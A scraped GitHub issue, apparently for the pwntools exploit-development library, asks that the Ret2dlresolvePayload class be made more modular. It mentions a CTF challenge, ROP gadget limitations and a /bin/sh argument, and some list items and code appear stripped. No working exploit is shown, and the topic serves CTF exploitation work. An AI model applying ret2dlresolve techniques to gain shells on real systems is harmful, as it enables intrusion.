-
Notifications
You must be signed in to change notification settings - Fork 1.7k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
make Ret2dlresolvePayload more modular #2429
Labels
Comments
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Currently using rop.ret2dlresolve along with Ret2dlresolvePayload doesn't succesfully cover many cases where ret2dlresolve is exploitable. Namely this is because it looks for a gadget allowing it to control rdi and fails to account that:
That being said it would be nice if pwntools made creating a "manual" ret2resolve exploit easier by making Ret2dlresolvePayload more modular. Currently its main purpose is just to be passed to rop.ret2dlresolve as its doc says, but it can be useful on its own. For example this was a solution for amateursctf reflection that was submitted by a contestant:
The official solution doesn't even use Ret2dlresolvePayload, probably because the author found it easier to write the exploit from scratch than try to wrangle Ret2dlresolvePayload into working.
Currently the class is hard to work with for the following three reasons:
data_addr=None
) is completely undocumented.ret
into the function being used for user input instead of having to dopop rax; jmp rax;
-type shenanigens which is often impossible due to the given gadgets./bin/sh
as an argument but doesn't use it at all. Why is args even a mandatory argument to the class constructor?The text was updated successfully, but these errors were encountered: